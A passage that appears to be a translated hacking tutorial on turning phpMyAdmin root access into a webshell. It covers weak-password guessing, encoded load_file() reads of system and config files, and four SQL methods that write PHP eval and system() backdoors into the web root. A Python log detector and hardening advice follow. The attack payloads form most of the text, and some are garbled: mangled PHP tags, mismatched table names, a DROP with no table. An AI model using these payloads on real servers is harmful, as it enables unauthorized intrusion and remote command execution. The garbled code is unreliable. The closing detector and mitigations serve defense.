Obtaining a webshell by executing SQL statements in phpMyAdmin
You can try to obtain the root password in the following ways:
Method: load_file()
C:\boot.ini
load_file(0x433A5C626F6F742E696E69) in hexadecimal notation
load_file(char(67,58,92,98,111,111,116,46,105,110,105)) in ASCII codes
conn.php config.php mainconn.php
In many cases, if the administrator has not changed the root password, weak passwords such as root, rrot, 123 and the like can be used to log on.
When we have root, the highest privilege in phpMyAdmin, and know the physical path of the website (the physical path is usually displayed in the website's admin back end), we can use SQL statements to obtain a webshell on the website.
Assume that the physical path of the website is C:/htdocs.
You can then execute the following SQL statements:
---- Start code ---
Create TABLE a (cmd text not null );
Insert INTO a (cmd) VALUES ('<? Php @ eval ($ _ POST [cmd])?> ');
Select cmd from a into outfile 'C:/htdocs/1. Php'; (modify the physical path of the website to/here /)
Drop table if exists;
---- End code ---
If the expected result is displayed after the statements are executed, the SQL has run successfully. Appending 1.php to the website's root URL then reaches the one-line webshell directly.
The webshell can then be accessed by connecting to it with a client.
More detailed methods:
Method 1
Create table 'mysql'. 'Darkmoon '('darkmoon1' text not null );
Insert into 'mysql'. 'Dark' ('darkmoon1') VALUES ('<? Php @ eval ($ _ POST [pass]);?> ');
SELECT 'darkmoon1' FROM 'darkmoon 'into outfile' d:/wamp/www/exehack. Php ';
Drop table if exists 'darkmoon ';
(This method is the most common and has a high success rate. Anyone who knows SQL will understand it at a glance.)
The above code selects the mysql database, creates a table named darkmoon, and adds a field named darkmoon1.
It then inserts a line of code into the darkmoon1 field.
Next it exports the one-line payload from the darkmoon1 field to the file d:/wamp/www/exehack.php (the path here is the website's program path).
The last step deletes the darkmoon table.
Method 2
Create TABLE moon (darkmoon text not null );
Insert INTO moon (darkmoon) VALUES ('<? Php @ eval ($ _ POST [pass]);?> ');
Select darkmoon from moon into outfile 'd:/wamp/www/exehack. Php ';
Drop table if exists moon;
The above method is basically consistent with Method 1.
Method 3:
Select '<? Php @ eval ($ _ POST [pass]);?> 'Into outfile' d:/wamp/www/exehack. Php'
Method 4
Select '<? Php echo '<pre>'; system ($ _ GET ['cmd']); echo '</pre>';?> 'Into outfile' d:/wamp/www/exehack. Php'
The difference is that, once the export succeeds, DOS commands can be executed directly (as long as the permissions are sufficient).
How to use: www.xxx.com/exehack.php? Cmd = (cmd = directly execute the doscommand)
The above four methods are generally sufficient to obtain a webshell on the website.
If you know the physical path of the website, try the method or the physical path of the website.
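From the defender's side, every method above leaves the same two traces in the MySQL query log: a load_file() read (possibly hex- or char()-encoded, so plain string matching on the path misses it) and an INTO OUTFILE write whose target ends in a script extension. The following is an added example, not code from the original page; the function names and the sample log statements are constructed for illustration, and it assumes the log has already been split into one statement per entry.

```python
import re

# Extensions a web server may execute; a SQL export ending in one is suspicious.
SCRIPT_EXT = (".php", ".phtml", ".asp", ".aspx", ".jsp")

OUTFILE_RE = re.compile(r"into\s+(?:outfile|dumpfile)\s*'([^']*)'", re.I)
# load_file() argument as a quoted string, a 0x hex literal, or char(...) codes.
LOADFILE_RE = re.compile(
    r"load_file\s*\(\s*(?:'([^']*)'|0x([0-9a-f]+)|char\s*\(([\d\s,]+)\))", re.I)


def decode_load_file(stmt):
    """Return the plain-text path passed to load_file(), or None if absent."""
    m = LOADFILE_RE.search(stmt)
    if not m:
        return None
    quoted, hexed, codes = m.groups()
    if quoted is not None:
        return quoted
    if hexed is not None:
        if len(hexed) % 2:  # MySQL treats odd-length hex as having a leading 0
            hexed = "0" + hexed
        return bytes.fromhex(hexed).decode("latin-1")
    # char(): one byte per code; codes above 255 are truncated here.
    return bytes(int(n) & 0xFF for n in codes.split(",") if n.strip()).decode("latin-1")


def inspect(stmt):
    """Return (kind, path) findings for one logged SQL statement."""
    findings = []
    m = OUTFILE_RE.search(stmt)
    if m and m.group(1).strip().lower().endswith(SCRIPT_EXT):
        findings.append(("file-write", m.group(1).strip()))
    path = decode_load_file(stmt)
    if path is not None:
        findings.append(("file-read", path))
    return findings


# Constructed sample statements, as they might appear in a general query log.
SAMPLE_LOG = [
    "SELECT id, name FROM users WHERE id = 7",
    "SELECT load_file(0x433A5C626F6F742E696E69)",
    "SELECT load_file(char(67,58,92,98,111,111,116,46,105,110,105))",
    "SELECT cmd FROM a INTO OUTFILE 'C:/htdocs/1.php'",
    "SELECT * FROM orders INTO OUTFILE '/var/backup/orders.csv'",
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        for kind, path in inspect(line):
            print(f"{kind:10} {path!r:22} <- {line}")
```

Setting secure_file_priv to a directory outside the web root (or to NULL) and not granting the FILE privilege to the accounts phpMyAdmin uses blocks both operations at the server, independent of any log-based detection.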